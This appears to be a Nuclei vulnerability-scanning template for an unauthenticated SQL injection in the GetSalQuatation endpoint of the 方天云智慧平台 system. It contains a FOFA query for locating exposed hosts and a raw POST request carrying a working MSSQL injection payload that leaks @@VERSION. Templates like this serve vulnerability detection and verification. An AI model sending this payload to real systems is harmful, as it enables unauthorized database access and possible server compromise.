id: fangtianyunzhihui-GetSalQuatation-sql

info:
  name: 方天云智慧平台系统 GetSalQuatation SQL注入漏洞
  author: Superhero
  severity: high
  description: |-
    fofa: body="AjaxMethods.asmx/GetCompanyItem"
    方天云智慧平台系统 GetSalQuatation 接口存在SQL注入漏洞，未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息（例如，管理员后台密码、站点的用户个人信息）之外，甚至在高权限的情况可向服务器中写入木马，进一步获取服务器系统权限。
  reference:
    - https://mp.weixin.qq.com/s?__biz=MzkzMTcwMTg1Mg==&mid=2247485984&idx=1&sn=c27daed34a76144b4129b6e399ba0fcc&chksm=c267bf13f5103605ec2f99fbd4a3ac7d5d3f2de9efe3059bd7e6380ad6f8be953d726acde20f&token=2024266625&lang=zh_CN#rd
  tags: sql injection



http:
  - raw:
      - |
        POST /AjaxMethods.asmx/GetSalQuatation HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {ID:"(SELECT CHAR(113)+CHAR(120)+CHAR(122)+CHAR(112)+CHAR(113)+(CASE WHEN (8725=8725) THEN @@VERSION ELSE CHAR(48) END)+CHAR(113)+CHAR(122)+CHAR(118)+CHAR(106)+CHAR(113))"}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'Microsoft SQL'
      - type: status
        status: 
          - 500





